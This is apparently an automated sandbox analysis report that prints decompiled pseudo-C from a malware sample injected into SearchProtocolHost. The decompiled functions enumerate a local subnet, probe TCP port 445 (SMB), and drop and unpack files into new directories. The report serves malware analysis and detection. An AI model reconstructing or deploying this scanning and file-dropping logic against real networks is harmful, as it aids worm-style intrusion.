                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Sleep$gethostbynamegethostname
                                                • String ID: %d.%d.%d.*
                                                • API String ID: 3714389383-3742512694
                                                • Opcode ID: a51d16c2b7fca35c0fbbad79958fc56b7baab80f39eadbac01cad751bb500fe9
                                                • Instruction ID: 2dc31193801463bf0305ba6c6d90724fdff8a7ce306e770df13f09a1da8d9689
                                                • Opcode Fuzzy Hash: a51d16c2b7fca35c0fbbad79958fc56b7baab80f39eadbac01cad751bb500fe9
                                                • Instruction Fuzzy Hash: 7051FEB0C002589FDB21DB64CCA4FFEBBB9AF05344F144189E54AAB291DB70AA44CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 510 2fab4e0-2fab4f8 511 2fab4fe-2fab501 510->511 512 2fab646-2fab654 call 2fb0a5d 510->512 511->512 514 2fab507-2fab519 EnterCriticalSection 511->514 516 2fab520-2fab524 514->516 517 2fab532-2fab57b call 2fa5180 516->517 518 2fab526-2fab52c 516->518 523 2fab5da-2fab5dc call 2fb0a6e 517->523 524 2fab57d-2fab580 517->524 518->517 519 2fab62c-2fab633 518->519 519->516 522 2fab639-2fab645 LeaveCriticalSection 519->522 522->512 527 2fab5e1-2fab616 call 2fb5c70 call 2fa6f70 523->527 524->519 526 2fab586-2fab5c2 call 2fb0a6e call 2fb5c70 call 2fa6f70 524->526 526->519 539 2fab5c4-2fab5d8 526->539 527->519 538 2fab618-2fab626 527->538 538->519 539->519
                                                C-Code - Quality: 76%
                                                			E02FAB4E0(void* __ebx, signed char* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v9;
                                                				short _v11;
                                                				char _v15;
                                                				char _v40;
                                                				char _v41;
                                                				intOrPtr _v48;
                                                				void* __esi;
                                                				signed int _t28;
                                                				intOrPtr _t37;
                                                				intOrPtr _t38;
                                                				signed char* _t51;
                                                				intOrPtr _t61;
                                                				intOrPtr _t63;
                                                				signed int _t64;
                                                				void* _t65;
                                                
                                                				_t28 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t28 ^ _t64;
                                                				_t51 = __ecx;
                                                				_v41 = __edx;
                                                				if(__ecx == 0 ||  *((char*)(__ecx)) == 0x7f) {
                                                					L13:
                                                					return E02FB0A5D(_v8 ^ _t64, _t63);
                                                				} else {
                                                					_push(_t63);
                                                					EnterCriticalSection(0x2fd6a74);
                                                					_t61 = 1;
                                                					do {
                                                						if(_v41 == 0 || _t61 != (_t51[3] & 0x000000ff)) {
                                                							asm("xorps xmm0, xmm0");
                                                							_push(_t61);
                                                							_push(_t51[2] & 0x000000ff);
                                                							_push(_t51[1] & 0x000000ff);
                                                							_v40 = 0;
                                                							asm("movups [ebp-0x23], xmm0");
                                                							_v15 = 0;
                                                							asm("movq [ebp-0x13], xmm0");
                                                							_v11 = 0;
                                                							_v9 = 0;
                                                							E02FA5180( &_v40, 0x20, "%d.%d.%d.%d",  *_t51 & 0x000000ff);
                                                							_t65 = _t65 + 0x1c;
                                                							_t37 = _a4;
                                                							if(_t37 == 0) {
                                                								_t38 = E02FB0A6E(_t63, __eflags, 0x2c); // executed
                                                								_t63 = _t38;
                                                								_v48 = _t63;
                                                								E02FB5C70(_t63, 0x20,  &_v40);
                                                								_t65 = _t65 + 0x10;
                                                								 *((intOrPtr*)(_t63 + 0x20)) = 0;
                                                								 *((intOrPtr*)(_t63 + 0x24)) = 0;
                                                								 *((intOrPtr*)(_t63 + 0x28)) = 0;
                                                								__eflags = E02FA6F70(0x2fd5c48);
                                                								if(__eflags != 0) {
                                                									 *((intOrPtr*)( *0x2fd5c64 +  *0x2fd5c68 * 4)) = _t63;
                                                									 *0x2fd5c68 =  *0x2fd5c68 + 1;
                                                									__eflags =  *0x2fd5c68;
                                                								}
                                                							} else {
                                                								_t71 = _t37 == 1;
                                                								if(_t37 == 1) {
                                                									_t63 = E02FB0A6E(_t63, _t71, 0x2c);
                                                									_v48 = _t63;
                                                									E02FB5C70(_t63, 0x20,  &_v40);
                                                									_t65 = _t65 + 0x10;
                                                									 *((intOrPtr*)(_t63 + 0x20)) = 0;
                                                									 *((intOrPtr*)(_t63 + 0x24)) = 0;
                                                									 *((intOrPtr*)(_t63 + 0x28)) = 1;
                                                									if(E02FA6F70(0x2fd5c20) != 0) {
                                                										 *((intOrPtr*)( *0x2fd5c3c +  *0x2fd5c40 * 4)) = _t63;
                                                										 *0x2fd5c40 =  *0x2fd5c40 + 1;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						_t61 = _t61 + 1;
                                                					} while (_t61 <= 0xff);
                                                					LeaveCriticalSection(0x2fd6a74);
                                                					_pop(_t63);
                                                					goto L13;
                                                				}
                                                			}




















                                                APIs
                                                • EnterCriticalSection.KERNEL32(02FD6A74,00000000,00000000,?,?,?,?,?,?,?,02FA7D9D,00000000,00000000,00000000,00000001), ref: 02FAB50E
                                                • new.LIBCMT ref: 02FAB588
                                                • new.LIBCMT ref: 02FAB5DC
                                                • LeaveCriticalSection.KERNEL32(02FD6A74), ref: 02FAB63E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID: %d.%d.%d.%d
                                                • API String ID: 3168844106-3491811756
                                                • Opcode ID: e5c8109fd1d4004a3fe9bbd834e1cec252cbc888dcc9d878b792d99bfb8de3ed
                                                • Instruction ID: 32245deab9ec0188fbd314a25d7c8a9c0b56737c20cb6e44e82def4771829a75
                                                • Opcode Fuzzy Hash: e5c8109fd1d4004a3fe9bbd834e1cec252cbc888dcc9d878b792d99bfb8de3ed
                                                • Instruction Fuzzy Hash: 8F413AB0D403049BE721DF78D854BBEBBF6EF1A384F440599EA45AB281DB755500CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E02FA7140(void* __eflags, CHAR* _a4) {
                                                				long _v8;
                                                				void* _v12;
                                                				long _v16;
                                                				void* _t12;
                                                				void* _t13;
                                                				int _t16;
                                                				void* _t21;
                                                				void* _t22;
                                                				long _t24;
                                                				void* _t26;
                                                				void* _t29;
                                                
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_t12 = E02FA4AC0(_t21, _t22,  &_v12,  &_v8); // executed
                                                				if(_t12 != 0) {
                                                					_t24 = _v8;
                                                					_v16 = 0;
                                                					_t13 = CreateFileA(_a4, 0x40000000, 2, 0, 2, 0x80, 0); // executed
                                                					_t29 = _t13;
                                                					if(_t29 == 0) {
                                                						L5:
                                                						return 0; // executed
                                                					} else {
                                                						_t26 = _v12;
                                                						_t16 = WriteFile(_t29, _t26, _t24,  &_v16, 0); // executed
                                                						_push(_t29);
                                                						if(_t16 != 0) {
                                                							FindCloseChangeNotification(); // executed
                                                							LocalFree(_t26); // executed
                                                							return 1;
                                                						} else {
                                                							CloseHandle();
                                                							goto L5;
                                                						}
                                                					}
                                                				} else {
                                                					return _t12;
                                                				}
                                                			}















                                                APIs
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 02FA718D
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 02FA71A5
                                                • CloseHandle.KERNEL32(00000000,?,?), ref: 02FA71B0
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID:
                                                • API String ID: 1065093856-0
                                                • Opcode ID: 697f123df4cf43fe86cec64ef7c1f3f449e6175a46e44642eff807a875fe0c8b
                                                • Instruction ID: 932b181584a1a14977d2d4ee757bd958eebb9e7ef9ef177bbea9317a261abde4
                                                • Opcode Fuzzy Hash: 697f123df4cf43fe86cec64ef7c1f3f449e6175a46e44642eff807a875fe0c8b
                                                • Instruction Fuzzy Hash: A5018472D4020CB7EB209E95AD0AFDEFBBC9B45755F504185FD04B7240D7B065158AE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E02FAB3C0(void* __ebx, void* __esi, intOrPtr _a4) {
                                                				void* __edi;
                                                				void* _t9;
                                                				void* _t11;
                                                				intOrPtr _t19;
                                                				intOrPtr _t24;
                                                				void* _t28;
                                                
                                                				_t24 = _a4;
                                                				if(_t24 != 0) {
                                                					InterlockedIncrement(0x2fd6a48);
                                                					_t11 = E02FAB320(__ebx, _t24, _t24); // executed
                                                					_t31 = _t11;
                                                					if(_t11 != 0) {
                                                						_push(__ebx);
                                                						_push(__esi);
                                                						_t19 = E02FB0A6E(__esi, _t31, 0x2c);
                                                						_a4 = _t19;
                                                						E02FB5C70(_t19, 0x20, _t24);
                                                						_t28 = _t28 + 0x10;
                                                						 *((intOrPtr*)(_t19 + 0x20)) = 0;
                                                						 *((intOrPtr*)(_t19 + 0x24)) = 0;
                                                						 *((intOrPtr*)(_t19 + 0x28)) =  *((intOrPtr*)(_t24 + 0x28));
                                                						EnterCriticalSection(0x2fd6a5c);
                                                						if(E02FA6F70(0x2fd5b80) != 0) {
                                                							 *((intOrPtr*)( *0x2fd5b9c +  *0x2fd5ba0 * 4)) = _t19;
                                                							 *0x2fd5ba0 =  *0x2fd5ba0 + 1;
                                                						}
                                                						LeaveCriticalSection(0x2fd6a5c);
                                                					}
                                                					_push(0x2c);
                                                					E02FB0AA1(_t24);
                                                					return InterlockedDecrement(0x2fd6a48);
                                                				}
                                                				return _t9;
                                                			}










                                                APIs
                                                • InterlockedIncrement.KERNEL32(02FD6A48), ref: 02FAB3D4
                                                  • Part of subcall function 02FAB320: socket.WS2_32(00000002,00000001,00000006), ref: 02FAB33A
                                                  • Part of subcall function 02FAB320: inet_addr.WS2_32(?), ref: 02FAB351
                                                  • Part of subcall function 02FAB320: htons.WS2_32(000001BD), ref: 02FAB35F
                                                  • Part of subcall function 02FAB320: connect.WS2_32(00000000,?,00000010), ref: 02FAB370
                                                  • Part of subcall function 02FAB320: closesocket.WS2_32(00000000), ref: 02FAB37C
                                                • new.LIBCMT ref: 02FAB3E9
                                                • EnterCriticalSection.KERNEL32(02FD6A5C), ref: 02FAB418
                                                • LeaveCriticalSection.KERNEL32(02FD6A5C), ref: 02FAB445
                                                • InterlockedDecrement.KERNEL32(02FD6A48), ref: 02FAB45D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalInterlockedSection$DecrementEnterIncrementLeaveclosesocketconnecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 2254562651-0
                                                • Opcode ID: b8c6755a931c8b62eca342548641069881b2c25fa19ded5ef6bdb57b6139d37a
                                                • Instruction ID: 03f82594d5c010292b5796632f5edd0e2e9090f5b65a93020413e27ef9762e71
                                                • Opcode Fuzzy Hash: b8c6755a931c8b62eca342548641069881b2c25fa19ded5ef6bdb57b6139d37a
                                                • Instruction Fuzzy Hash: 1901FEF4680308ABE7006F65EC55B6A7B3AFF55BD5F940008FF499B341D77194108B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E02FAFB00(CHAR* __ecx, void* __edx) {
                                                				intOrPtr _v0;
                                                				signed int _v8;
                                                				signed int _v12;
                                                				char _v268;
                                                				char _v271;
                                                				char _v272;
                                                				char _v528;
                                                				char _v532;
                                                				struct _FILETIME _v548;
                                                				struct _FILETIME _v556;
                                                				struct _FILETIME _v564;
                                                				long _v568;
                                                				char _v832;
                                                				char _v833;
                                                				struct _OVERLAPPED* _v840;
                                                				long _v844;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t91;
                                                				void _t93;
                                                				void _t95;
                                                				void _t96;
                                                				char _t103;
                                                				signed int _t107;
                                                				signed int _t109;
                                                				signed int _t110;
                                                				signed int _t113;
                                                				char _t114;
                                                				void* _t116;
                                                				signed int _t124;
                                                				void* _t130;
                                                				long _t133;
                                                				signed int _t143;
                                                				void* _t144;
                                                				signed int _t153;
                                                				signed int _t158;
                                                				signed int _t160;
                                                				long _t166;
                                                				void* _t169;
                                                				signed int _t171;
                                                				char _t172;
                                                				signed int _t173;
                                                				void* _t175;
                                                				void* _t183;
                                                				signed int _t185;
                                                				void* _t191;
                                                				intOrPtr _t192;
                                                				char _t194;
                                                				signed int* _t195;
                                                				signed int _t198;
                                                				signed int* _t206;
                                                				char _t218;
                                                				void* _t226;
                                                				void* _t228;
                                                				void* _t234;
                                                				signed int* _t235;
                                                				signed int _t236;
                                                				CHAR* _t243;
                                                				void* _t244;
                                                				void* _t245;
                                                				signed int _t247;
                                                				signed int* _t248;
                                                				long _t250;
                                                				void* _t251;
                                                				void* _t252;
                                                				void* _t253;
                                                				signed int _t254;
                                                				signed int _t256;
                                                				signed int _t258;
                                                				signed int _t263;
                                                				signed int _t264;
                                                				void* _t268;
                                                				void* _t270;
                                                
                                                				_t217 = __edx;
                                                				_t256 = _t263;
                                                				_t264 = _t263 - 0x20c;
                                                				_t91 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t91 ^ _t256;
                                                				_t243 = __ecx;
                                                				_t169 = __edx;
                                                				if(__ecx != 0) {
                                                					_t166 = GetFileAttributesA(__ecx); // executed
                                                					if(_t166 == 0xffffffff) {
                                                						CreateDirectoryA(_t243, 0);
                                                					}
                                                				}
                                                				_t93 =  *_t169;
                                                				if(_t93 == 0) {
                                                					L21:
                                                					_pop(_t244);
                                                					return E02FB0A5D(_v8 ^ _t256, _t244);
                                                				} else {
                                                					_t226 = _t169;
                                                					_t183 = _t169;
                                                					do {
                                                						if(_t93 == 0x2f || _t93 == 0x5c) {
                                                							_t226 = _t183;
                                                						}
                                                						_t93 =  *(_t183 + 1);
                                                						_t183 = _t183 + 1;
                                                					} while (_t93 != 0);
                                                					if(_t226 == _t169) {
                                                						L12:
                                                						_v268 = 0;
                                                						if(_t243 != 0) {
                                                							_t191 =  &_v268 - _t243;
                                                							do {
                                                								_t103 =  *_t243;
                                                								_t243 =  &(_t243[1]);
                                                								 *((char*)(_t191 + _t243 - 1)) = _t103;
                                                							} while (_t103 != 0);
                                                						}
                                                						_t245 = _t169;
                                                						do {
                                                							_t95 =  *_t169;
                                                							_t169 = _t169 + 1;
                                                						} while (_t95 != 0);
                                                						_t171 = _t169 - _t245;
                                                						_t228 =  &_v268 - 1;
                                                						do {
                                                							_t96 =  *(_t228 + 1);
                                                							_t228 = _t228 + 1;
                                                						} while (_t96 != 0);
                                                						_t185 = _t171 >> 2;
                                                						memcpy(_t228, _t245, _t185 << 2);
                                                						if(GetFileAttributesA(memcpy(_t245 + _t185 + _t185, _t245, _t171 & 0x00000003)) == 0xffffffff) {
                                                							CreateDirectoryA( &_v268, 0);
                                                						}
                                                						goto L21;
                                                					} else {
                                                						_t234 = _t226 - _t169;
                                                						E02FC3DB0( &_v528, _t169, _t234);
                                                						_t264 = _t264 + 0xc;
                                                						if(_t234 >= 0x104) {
                                                							E02FB0E90();
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							_push(_t256);
                                                							_t258 = _t264;
                                                							_t268 = _t264 - 0x344;
                                                							_t107 =  *0x2fcf008; // 0x93ad1eea
                                                							_v548.dwLowDateTime = _t107 ^ _t258;
                                                							_push(_t169);
                                                							_t172 = _v532;
                                                							_push(_t234);
                                                							_t235 = _t183;
                                                							__eflags = _t235[1] - 0xffffffff;
                                                							if(_t235[1] != 0xffffffff) {
                                                								E02FAF2D0( *_t235, _t217);
                                                							}
                                                							_t109 =  *_t235;
                                                							_t192 = _v0;
                                                							_t235[1] = 0xffffffff;
                                                							__eflags = _t192 -  *((intOrPtr*)(_t109 + 4));
                                                							if(_t192 <  *((intOrPtr*)(_t109 + 4))) {
                                                								__eflags = _t192 -  *((intOrPtr*)(_t109 + 0x10));
                                                								if(_t192 <  *((intOrPtr*)(_t109 + 0x10))) {
                                                									E02FAEC60(_t109);
                                                									_t192 = _v0;
                                                								}
                                                								_t110 =  *_t235;
                                                								_push(_t243);
                                                								__eflags =  *((intOrPtr*)(_t110 + 0x10)) - _t192;
                                                								if( *((intOrPtr*)(_t110 + 0x10)) < _t192) {
                                                									do {
                                                										_t254 =  *_t235;
                                                										__eflags = _t254;
                                                										if(_t254 != 0) {
                                                											__eflags =  *(_t254 + 0x18);
                                                											if( *(_t254 + 0x18) != 0) {
                                                												_t217 =  *((intOrPtr*)(_t254 + 0x10)) + 1;
                                                												__eflags = _t217 -  *((intOrPtr*)(_t254 + 4));
                                                												if(_t217 !=  *((intOrPtr*)(_t254 + 4))) {
                                                													 *((intOrPtr*)(_t254 + 0x10)) = _t217;
                                                													 *((intOrPtr*)(_t254 + 0x14)) =  *((intOrPtr*)(_t254 + 0x14)) +  *((intOrPtr*)(_t254 + 0x48)) + 0x2e +  *((intOrPtr*)(_t254 + 0x50)) +  *((intOrPtr*)(_t254 + 0x4c));
                                                													_t37 = _t254 + 0x28; // 0x28
                                                													_t217 = _t37;
                                                													_t38 = _t254 + 0x78; // 0x78
                                                													_t158 = E02FAE7C0(_t254, _t37, _t38, 0, 0);
                                                													_t192 = _v0;
                                                													_t268 = _t268 - 0x10 + 0x1c;
                                                													asm("sbb eax, eax");
                                                													_t160 =  ~_t158 + 1;
                                                													__eflags = _t160;
                                                													 *(_t254 + 0x18) = _t160;
                                                												}
                                                											}
                                                										}
                                                										_t153 =  *_t235;
                                                										__eflags =  *((intOrPtr*)(_t153 + 0x10)) - _t192;
                                                									} while ( *((intOrPtr*)(_t153 + 0x10)) < _t192);
                                                								}
                                                								E02FAF4E0(_t172, _t235, _t217, _t235, _t192,  &_v832);
                                                								__eflags = _v568 & 0x00000010;
                                                								_t113 =  *_t172;
                                                								if((_v568 & 0x00000010) == 0) {
                                                									_t218 = _t172;
                                                									_t194 = _t172;
                                                									__eflags = _t113;
                                                									while(_t113 != 0) {
                                                										__eflags = _t113 - 0x2f;
                                                										if(_t113 == 0x2f) {
                                                											L46:
                                                											_t49 = _t194 + 1; // 0x2fa5105
                                                											_t218 = _t49;
                                                										} else {
                                                											__eflags = _t113 - 0x5c;
                                                											if(_t113 == 0x5c) {
                                                												goto L46;
                                                											}
                                                										}
                                                										_t50 = _t194 + 1; // 0x2fd6a4c
                                                										_t113 =  *_t50;
                                                										_t194 = _t194 + 1;
                                                										__eflags = _t113;
                                                									}
                                                									_t195 = _t172;
                                                									_t247 =  &_v272 - _t172;
                                                									__eflags = _t247;
                                                									do {
                                                										_t114 =  *_t195;
                                                										_t52 =  &(_t195[0]); // 0x2fd6a4c
                                                										_t195 = _t52;
                                                										 *((char*)(_t247 + _t195 - 1)) = _t114;
                                                										__eflags = _t114;
                                                									} while (_t114 != 0);
                                                									__eflags = _t218 - _t172;
                                                									if(_t218 != _t172) {
                                                										_t116 = _t218 - _t172;
                                                										__eflags = _t116 - 0x104;
                                                										if(_t116 >= 0x104) {
                                                											E02FB0E90();
                                                											asm("int3");
                                                											asm("int3");
                                                											asm("int3");
                                                											_push(_t247);
                                                											_t248 = _t195;
                                                											_push(_t235);
                                                											__eflags = _t248[1] - 0xffffffff;
                                                											if(_t248[1] != 0xffffffff) {
                                                												E02FAF2D0( *_t248, _t218);
                                                											}
                                                											_t236 =  *_t248;
                                                											_t248[1] = 0xffffffff;
                                                											__eflags = _t236;
                                                											if(_t236 != 0) {
                                                												__eflags =  *(_t236 + 0x7c);
                                                												if( *(_t236 + 0x7c) != 0) {
                                                													E02FAF2D0(_t236, _t218);
                                                												}
                                                												_push(_t172);
                                                												_t173 =  *_t236;
                                                												__eflags = _t173;
                                                												if(_t173 != 0) {
                                                													__eflags =  *((char*)(_t173 + 0x10));
                                                													if( *((char*)(_t173 + 0x10)) != 0) {
                                                														CloseHandle( *(_t173 + 4));
                                                													}
                                                													_push(0x20);
                                                													E02FB0AA1(_t173);
                                                													_t268 = _t268 + 8;
                                                												}
                                                												L02FB5A36(_t236);
                                                											}
                                                											__eflags = 0;
                                                											 *_t248 = 0;
                                                											return 0;
                                                										} else {
                                                											 *((char*)(_t258 + _t116 - 0x108)) = 0;
                                                											_t124 = _v272;
                                                											__eflags = _t124 - 0x2f;
                                                											if(_t124 == 0x2f) {
                                                												L58:
                                                												wsprintfA( &_v532, "%s%s",  &_v272, _t218);
                                                												_t270 = _t268 + 0x10;
                                                												_t198 = 0;
                                                												__eflags = 0;
                                                											} else {
                                                												__eflags = _t124 - 0x5c;
                                                												if(_t124 == 0x5c) {
                                                													goto L58;
                                                												} else {
                                                													__eflags = _t124;
                                                													if(_t124 == 0) {
                                                														goto L57;
                                                													} else {
                                                														__eflags = _v271 - 0x3a;
                                                														if(_v271 == 0x3a) {
                                                															goto L58;
                                                														} else {
                                                															goto L57;
                                                														}
                                                													}
                                                												}
                                                											}
                                                											goto L59;
                                                										}
                                                									} else {
                                                										_v272 = _t114;
                                                										L57:
                                                										_t247 =  &(_t235[0x50]);
                                                										wsprintfA( &_v532, "%s%s%s", _t247,  &_v272, _t218);
                                                										_t270 = _t268 + 0x14;
                                                										_t198 = _t247;
                                                										L59:
                                                										E02FAFB00(_t198,  &_v272); // executed
                                                										_t130 = CreateFileA( &_v532, 0x40000000, 0, 0, 2, _v568, 0); // executed
                                                										_t175 = _t130;
                                                										__eflags = _t175 - 0xffffffff;
                                                										if(_t175 != 0xffffffff) {
                                                											E02FAEF10( *_t235, _t235[0x4e]); // executed
                                                											__eflags = _t235[0x4f];
                                                											if(__eflags == 0) {
                                                												_push(0x4000); // executed
                                                												_t144 = E02FB0AB4(_t247, __eflags); // executed
                                                												_t270 = _t270 + 4;
                                                												_t235[0x4f] = _t144;
                                                											}
                                                											_v840 = 0;
                                                											while(1) {
                                                												_t221 = _t235[0x4f];
                                                												_t133 = E02FAF090( *_t235, _t235[0x4f], 0x4000,  &_v833); // executed
                                                												_t250 = _t133;
                                                												_t270 = _t270 + 8;
                                                												__eflags = _t250 - 0xffffff96;
                                                												if(_t250 == 0xffffff96) {
                                                													break;
                                                												}
                                                												__eflags = _t250;
                                                												if(__eflags < 0) {
                                                													L70:
                                                													_v840 = 0x5000000;
                                                												} else {
                                                													if(__eflags <= 0) {
                                                														L68:
                                                														__eflags = _v833;
                                                														if(_v833 != 0) {
                                                															SetFileTime(_t175,  &_v556,  &_v564,  &_v548); // executed
                                                														} else {
                                                															__eflags = _t250;
                                                															if(_t250 != 0) {
                                                																continue;
                                                															} else {
                                                																goto L70;
                                                															}
                                                														}
                                                													} else {
                                                														_t143 = WriteFile(_t175, _t235[0x4f], _t250,  &_v844, 0); // executed
                                                														__eflags = _t143;
                                                														if(_t143 == 0) {
                                                															_v840 = 0x400;
                                                														} else {
                                                															goto L68;
                                                														}
                                                													}
                                                												}
                                                												L74:
                                                												FindCloseChangeNotification(_t175); // executed
                                                												E02FAF2D0( *_t235, _t221);
                                                												__eflags = _v12 ^ _t258;
                                                												_pop(_t251);
                                                												return E02FB0A5D(_v12 ^ _t258, _t251);
                                                												goto L87;
                                                											}
                                                											_v840 = 0x1000;
                                                											goto L74;
                                                										} else {
                                                											_pop(_t252);
                                                											__eflags = _v12 ^ _t258;
                                                											return E02FB0A5D(_v12 ^ _t258, _t252);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = _t113 - 0x2f;
                                                									if(_t113 == 0x2f) {
                                                										L41:
                                                										_t206 = 0;
                                                										__eflags = 0;
                                                									} else {
                                                										__eflags = _t113 - 0x5c;
                                                										if(_t113 == 0x5c) {
                                                											goto L41;
                                                										} else {
                                                											__eflags = _t113;
                                                											if(_t113 == 0) {
                                                												L40:
                                                												_t206 =  &(_t235[0x50]);
                                                											} else {
                                                												__eflags =  *((char*)(_t172 + 1)) - 0x3a;
                                                												if( *((char*)(_t172 + 1)) == 0x3a) {
                                                													goto L41;
                                                												} else {
                                                													goto L40;
                                                												}
                                                											}
                                                										}
                                                									}
                                                									E02FAFB00(_t206, _t172);
                                                									_pop(_t253);
                                                									__eflags = _v12 ^ _t258;
                                                									return E02FB0A5D(_v12 ^ _t258, _t253);
                                                								}
                                                							} else {
                                                								__eflags = _v12 ^ _t258;
                                                								return E02FB0A5D(_v12 ^ _t258, _t243);
                                                							}
                                                						} else {
                                                							 *((char*)(_t256 + _t234 - 0x20c)) = 0;
                                                							E02FAFB00(_t243,  &_v528);
                                                							goto L12;
                                                						}
                                                					}
                                                				}
                                                				L87:
                                                 			}

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000000,?,02FA5104), ref: 02FAFB1E
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02FAFB2C
                                                • GetFileAttributesA.KERNEL32(00000000,?,?,02FA5104), ref: 02FAFBDD
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02FAFBF2
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: AttributesCreateDirectoryFile
                                                • String ID:
                                                • API String ID: 3401506121-0
                                                • Opcode ID: 86c0e41b8f6fe393f71857de46e12cc6c33949a2caebb1daa55aa3b5312534a8
                                                • Instruction ID: 37a4c52857ea93cbeb4d81cb7dd93446a785cc9f8609bb23c128320df35597d7
                                                • Opcode Fuzzy Hash: 86c0e41b8f6fe393f71857de46e12cc6c33949a2caebb1daa55aa3b5312534a8
                                                • Instruction Fuzzy Hash: 5A41587190120A9BCB20CE28D8B0BE9F775AF453E0F50479DDAA59B681CB72594A8A90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E02FBAF7A() {
                                                				int _v8;
                                                				void* __ecx;
                                                				void* _t6;
                                                				int _t7;
                                                				char* _t8;
                                                				char* _t13;
                                                				int _t17;
                                                				void* _t19;
                                                				char* _t25;
                                                				WCHAR* _t27;
                                                
                                                				_t27 = GetEnvironmentStringsW();
                                                				if(_t27 == 0) {
                                                					L7:
                                                					_t13 = 0;
                                                				} else {
                                                					_t6 = E02FBAF43(_t27);
                                                					_pop(_t19);
                                                					_t17 = _t6 - _t27 >> 1;
                                                					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                					_v8 = _t7;
                                                					if(_t7 == 0) {
                                                						goto L7;
                                                					} else {
                                                						_t8 = E02FB7882(_t19, _t7); // executed
                                                						_t25 = _t8;
                                                						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                							_t13 = 0;
                                                						} else {
                                                							_t13 = _t25;
                                                							_t25 = 0;
                                                						}
                                                						E02FB7848(_t25);
                                                					}
                                                				}
                                                				if(_t27 != 0) {
                                                					FreeEnvironmentStringsW(_t27);
                                                				}
                                                				return _t13;
                                                			}














                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 02FBAF83
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02FBAFA6
                                                  • Part of subcall function 02FB7882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB78B4
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02FBAFCC
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 02FBAFEE
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                • String ID:
                                                • API String ID: 1794362364-0
                                                • Opcode ID: 3d912a172855b927f53c5ffe2488129573384ba7ab8ce08097687513bac69e92
                                                • Instruction ID: acb5ec188bacb47d35718520d0d55c11661b4679c37b5decc308eafbf6fa7cac
                                                • Opcode Fuzzy Hash: 3d912a172855b927f53c5ffe2488129573384ba7ab8ce08097687513bac69e92
                                                • Instruction Fuzzy Hash: 3F0171B3B452197F272315B75D8CCFBB96DDEC2AE53240129FA14D7200DF618D0285B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E02FAE0D0(CHAR* __ecx, long* _a8) {
                                                				void* _v8;
                                                				void* __esi;
                                                				void* _t12;
                                                				long _t13;
                                                				void* _t15;
                                                				long _t17;
                                                				signed int _t19;
                                                				signed int _t20;
                                                				long* _t24;
                                                				void* _t27;
                                                				char* _t28;
                                                
                                                				_push(__ecx);
                                                				_t24 = _a8;
